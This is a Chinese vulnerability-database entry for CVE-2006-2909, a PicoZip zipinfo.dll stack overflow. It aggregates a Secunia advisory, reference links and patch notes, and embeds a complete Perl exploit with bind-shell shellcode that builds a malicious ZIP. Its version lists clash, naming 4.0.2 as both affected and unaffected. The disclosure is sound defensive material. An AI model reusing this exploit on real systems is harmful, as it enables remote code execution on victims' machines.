CVE-2006-2909
CVSS7.5
发布时间 :2006-06-16 06:02:00
修订时间 :2011-03-07 21:37:17
NMCOEPS    

[原文]Stack-based buffer overflow in the info tip shell extension (zipinfo.dll) in PicoZip 4.01 allows remote attackers to execute arbitrary code via a long filename in an (1) ACE, (2) RAR, or (3) ZIP archive, which is triggered when the user moves the mouse over the archive.


[CNNVD]PicoZip Zipinfo.DLL 缓冲区溢出漏洞(CNNVD-200606-339)

        PicoZip 4.01中的信息提示shell扩展(zipinfo.dll)存在基于栈的缓冲区溢出。远程攻击者可以借助可在用户将鼠标移到档案上面时触发的,(1)ACE,(2)RAR或(3)ZIP档案中的长文件名,执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2909
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2909
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-339
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18425
(PATCH)  BID  18425
http://www.securityfocus.com/archive/1/archive/1/437103/100/0/threaded
(PATCH)  BUGTRAQ  20060614 Secunia Research: PicoZip "zipinfo.dll" Multiple Archives BufferOverflow
http://secunia.com/secunia_research/2006-42/advisory/
(VENDOR_ADVISORY)  MISC  http://secunia.com/secunia_research/2006-42/advisory/
http://secunia.com/advisories/20481
(VENDOR_ADVISORY)  SECUNIA  20481
http://www.vupen.com/english/advisories/2006/2330
(UNKNOWN)  VUPEN  ADV-2006-2330
http://www.picozip.com/changelog.html
(UNKNOWN)  CONFIRM  http://www.picozip.com/changelog.html
http://xforce.iss.net/xforce/xfdb/27096
(UNKNOWN)  XF  picozip-zipinfo-bo(27096)
http://www.securityfocus.com/archive/1/archive/1/437450/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060616 Re: Secunia Research: PicoZip "zipinfo.dll" Multiple Archives BufferOverflow
http://www.osvdb.org/26447
(UNKNOWN)  OSVDB  26447
http://securitytracker.com/id?1016308
(UNKNOWN)  SECTRACK  1016308
http://securityreason.com/securityalert/1104
(UNKNOWN)  SREASON  1104

- 漏洞信息

PicoZip Zipinfo.DLL 缓冲区溢出漏洞
高危 缓冲区溢出
2006-06-16 00:00:00 2006-06-16 00:00:00
远程  
        PicoZip 4.01中的信息提示shell扩展(zipinfo.dll)存在基于栈的缓冲区溢出。远程攻击者可以借助可在用户将鼠标移到档案上面时触发的,(1)ACE,(2)RAR或(3)ZIP档案中的长文件名,执行任意代码。

- 公告与补丁

        厂商已发布4.0.2 版以解决此问题;请参阅引用章节了解详情。
        http://www.picozip.com/download_PicoZipSetup.html
        

- 漏洞信息 (1917)

Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit (EDBID:1917)
windows local
2006-06-15 Verified
0 c0rrupt
N/A [点击下载]
#!/usr/bin/perl
# Pico Zip v. 4.01 Long Filename Buffer Overflow
# Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded
# Author - c0rrupt
# Greets - sh0uts to n0limit, muts, and brax for the music ;)
#
# The vulnerability is caused due to a boundary error within the
# "zipinfo.dll" info tip shell extension when reading a ACE, RAR, or
# ZIP archive that contains a file with an overly long filename. This
# can be exploited to cause a stack-based buffer overflow when the user
# moves the mouse cursor over a malicious archive either in Windows
# Explorer or from any program that uses the file-open dialog box.
#
# Running this script will generate a malformed zip file that will execute
# the given shellcode when a user moves his cursor over the file.
# (This exploit bypasses stack protection and DEP)

$offset = "\x6F\xE2\xD7\x5A"; #Windows XP SP2 English

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = 
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3".
"\x52\xaa\x9a\x83\xeb\xfc\xe2\xf4\x5f\x38\x41\xd7\x4b\xab\x55\x65".
"\x5c\x32\x21\xf6\x87\x76\x21\xdf\x9f\xd9\xd6\x9f\xdb\x53\x45\x11".
"\xec\x4a\x21\xc5\x83\x53\x41\xd3\x28\x66\x21\x9b\x4d\x63\x6a\x03".
"\x0f\xd6\x6a\xee\xa4\x93\x60\x97\xa2\x90\x41\x6e\x98\x06\x8e\xb2".
"\xd6\xb7\x21\xc5\x87\x53\x41\xfc\x28\x5e\xe1\x11\xfc\x4e\xab\x71".
"\xa0\x7e\x21\x13\xcf\x76\xb6\xfb\x60\x63\x71\xfe\x28\x11\x9a\x11".
"\xe3\x5e\x21\xea\xbf\xff\x21\xda\xab\x0c\xc2\x14\xed\x5c\x46\xca".
"\x5c\x84\xcc\xc9\xc5\x3a\x99\xa8\xcb\x25\xd9\xa8\xfc\x06\x55\x4a".
"\xcb\x99\x47\x66\x98\x02\x55\x4c\xfc\xdb\x4f\xfc\x22\xbf\xa2\x98".
"\xf6\x38\xa8\x65\x73\x3a\x73\x93\x56\xff\xfd\x65\x75\x01\xf9\xc9".
"\xf0\x01\xe9\xc9\xe0\x01\x55\x4a\xc5\x3a\xbb\xc6\xc5\x01\x23\x7b".
"\x36\x3a\x0e\x80\xd3\x95\xfd\x65\x75\x38\xba\xcb\xf6\xad\x7a\xf2".
"\x07\xff\x84\x73\xf4\xad\x7c\xc9\xf6\xad\x7a\xf2\x46\x1b\x2c\xd3".
"\xf4\xad\x7c\xca\xf7\x06\xff\x65\x73\xc1\xc2\x7d\xda\x94\xd3\xcd".
"\x5c\x84\xff\x65\x73\x34\xc0\xfe\xc5\x3a\xc9\xf7\x2a\xb7\xc0\xca".
"\xfa\x7b\x66\x13\x44\x38\xee\x13\x41\x63\x6a\x69\x09\xac\xe8\xb7".
"\x5d\x10\x86\x09\x2e\x28\x92\x31\x08\xf9\xc2\xe8\x5d\xe1\xbc\x65".
"\xd6\x16\x55\x4c\xf8\x05\xf8\xcb\xf2\x03\xc0\x9b\xf2\x03\xff\xcb".
"\x5c\x82\xc2\x37\x7a\x57\x64\xc9\x5c\x84\xc0\x65\x5c\x65\x55\x4a".
"\x28\x05\x56\x19\x67\x36\x55\x4c\xf1\xad\x7a\xf2\x53\xd8\xae\xc5".
"\xf0\xad\x7c\x65\x73\x52\xaa\x9a";



$filename = $shellcode . "A"x(524-length($shellcode)) . $offset;


$head   = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00".
	  "\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00".
	  "\x00\x00\x00\x00\x00\x00\x14\x02\x00\x00";

$middle = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00".
          "\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34".
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
	  "\x00\x00\x14\x02\x00\x00\x00\x00\x00\x00".
          "\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00";

$tail   = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00".
 	  "\x00\x00\x01\x00\x01\x00\x42\x02\x00\x00".
          "\x32\x02\x00\x00\x00\x00";

$evilzip = $head . $filename . $middle . $filename . $tail;

open(ZIPFILE,">exploit.zip")|| die "cannot open output file";
print(ZIPFILE $evilzip) || die "cannot write to output file";
close(ZIPFILE);

# milw0rm.com [2006-06-15]
		

- 漏洞信息 (F47452)

secunia-zipinfo.txt (PacketStormID:F47452)
2006-06-15 00:00:00
Tan Chew Keong  secunia.com
advisory,overflow,arbitrary,shell,code execution
windows
CVE-2006-2909
[点击下载]

Secunia Research has discovered a vulnerability in PicoZip version 4.01, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the "zipinfo.dll" info tip shell extension when reading a ACE, RAR, or ZIP archive that contains a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when the user moves the mouse cursor over a malicious archive either in Windows Explorer or from any program that uses the file-open dialog box. Successful exploitation allows arbitrary code execution.

====================================================================== 

                    Secunia Research 14/06/2006

     - PicoZip "zipinfo.dll" Multiple Archives Buffer Overflow -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* PicoZip version 4.01

Prior versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in PicoZip, which can
be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error within the 
"zipinfo.dll" info tip shell extension when reading a ACE, RAR, or
ZIP archive that contains a file with an overly long filename. This
can be exploited to cause a stack-based buffer overflow when the user
moves the mouse cursor over a malicious archive either in Windows
Explorer or from any program that uses the file-open dialog box.

Successful exploitation allows arbitrary code execution.

====================================================================== 
4) Solution 

Update to version 4.02.
http://www.picozip.com/downloads.html

====================================================================== 
5) Time Table 

06/06/2006 - Initial vendor notification.
07/06/2006 - Initial vendor reply.
14/06/2006 - Public disclosure.

====================================================================== 
6) Credits 

Discovered by Tan Chew Keong, Secunia Research.

====================================================================== 
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2006-2909 for the vulnerability.

Acubix:
http://www.picozip.com/changelog.html

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-42/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

    

- 漏洞信息

26447
PicoZip zipinfo.dll Multiple Archive Filename Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in PicoZip. The 'zipinfo.dll' fails to get info of ACE, RAR, or ZIP archives containing a file with a long filename resulting in a stack-based overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2006-06-14 Unknow
2006-06-15 Unknow

- 解决方案

Upgrade to version 4.02 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

PicoZip Zipinfo.DLL Buffer Overflow Vulnerability
Boundary Condition Error 18425
Yes No
2006-06-14 12:00:00 2006-06-16 06:41:00
Tan Chew Keong of Secunia Research disclosed this vulnerability.

- 受影响的程序版本

PicoZip PicoZip 4.0.1
PicoZip PicoZip 4.0.2

- 不受影响的程序版本

PicoZip PicoZip 4.0.2

- 漏洞讨论

PicoZip is susceptible to a buffer-overflow vulnerability. The application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

This issue allows attackers to execute arbitrary machine code in the context of users running the affected application.

Version 4.0.1 of PicoZip is vulnerable to this issue; prior versions may also be affected.

- 漏洞利用

The following exploit is available to demonstrate this issue:

- 解决方案

The vendor has released version 4.0.2 to address this issue; please see the reference section for further details.

mailto:vuldb@securityfocus.com


PicoZip PicoZip 4.0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站